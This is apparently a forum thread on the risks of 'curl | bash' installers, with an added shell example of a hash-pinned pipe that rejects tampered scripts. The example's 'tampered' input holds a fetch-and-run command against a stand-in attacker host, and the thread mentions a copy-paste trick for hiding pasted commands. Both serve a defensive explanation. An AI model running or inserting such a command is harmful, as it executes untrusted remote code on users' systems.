by hbz 3620 days ago
One of the biggest complaints about the curl | bash paradigm is the security implications. URLs can point to different content at different times. Project maintainers can change (and have changed) the content at these URLs for malicious or other reasons. A lot of people will not examine the source of what they're piping into the shell.

To me, https://github.com/jbenet/hashpipe addresses a lot of these issues by pinning the content to a hash.

You can't force somebody to read and understand the install script, but at least those who do can know it's the one they verified in advance.

3 comments
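The pinning step the post describes, as an added example that is not hashpipe's own code or part of the original thread: a POSIX sh filter that buffers everything from stdin, checks its SHA-256 against a digest recorded when the script was reviewed, and only then passes the bytes on to the shell. The digest format (plain lowercase hex SHA-256), the function names and the sample installer text are assumptions for illustration.

```shell
#!/bin/sh
# Hash-pinned pipe (added example, not hashpipe's implementation).
# Intended use: curl -sSL https://example.invalid/install.sh | pinned_pipe "$PIN" | sh
# where PIN is the SHA-256 hex digest recorded when the script was reviewed.

# Hex SHA-256 of stdin; works with GNU coreutils (sha256sum) or BSD/macOS (shasum).
sha256_hex() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum | cut -d' ' -f1
    else
        shasum -a 256 | cut -d' ' -f1
    fi
}

# pinned_pipe EXPECTED_HEX: copy stdin to stdout only if its digest matches.
# The whole stream is buffered before anything is emitted, so a truncated or
# tampered download can never reach the consuming shell, even partially.
pinned_pipe() {
    expected=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    tmp=$(mktemp) || return 2
    cat > "$tmp"
    actual=$(sha256_hex < "$tmp")
    if [ "$actual" = "$expected" ]; then
        cat "$tmp"
        rm -f "$tmp"
        return 0
    fi
    rm -f "$tmp"
    printf 'pinned_pipe: hash mismatch: expected %s, got %s; nothing forwarded\n' \
        "$expected" "$actual" >&2
    return 1
}

# Demonstration on constructed input (not a real installer).
reviewed_script='echo "installing foo"; mkdir -p "$HOME/.foo"'
pin=$(printf '%s\n' "$reviewed_script" | sha256_hex)   # recorded at review time

# 1. Unchanged content: the bytes pass through to the shell.
printf '%s\n' "$reviewed_script" | pinned_pipe "$pin" | sh

# 2. Content silently changed at the URL later: rejected, the shell gets nothing.
tampered_script='echo "installing foo"; curl -s http://evil.invalid/x | sh'
if ! printf '%s\n' "$tampered_script" | pinned_pipe "$pin" | sh; then
    echo "tampered script rejected"
fi
```

The check happens in the pipeline rather than in a separate step on purpose: a one-liner you can paste keeps the convenience people are actually choosing curl | bash for, while the pin ties the bytes to the version someone reviewed. It does not help anyone who never reviewed the script, or who copies a pin from the same untrusted page as the URL.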

There's also the fact that it's easy to display something in the browser other than what is pasted into the terminal[1]. That said, if you say "just run apt-get install foo" people will just copy that instead of the curl command.

1: http://thejh.net/misc/website-terminal-copy-paste

Kubernetes does it this way, so why not?
Because it's lazy and insecure?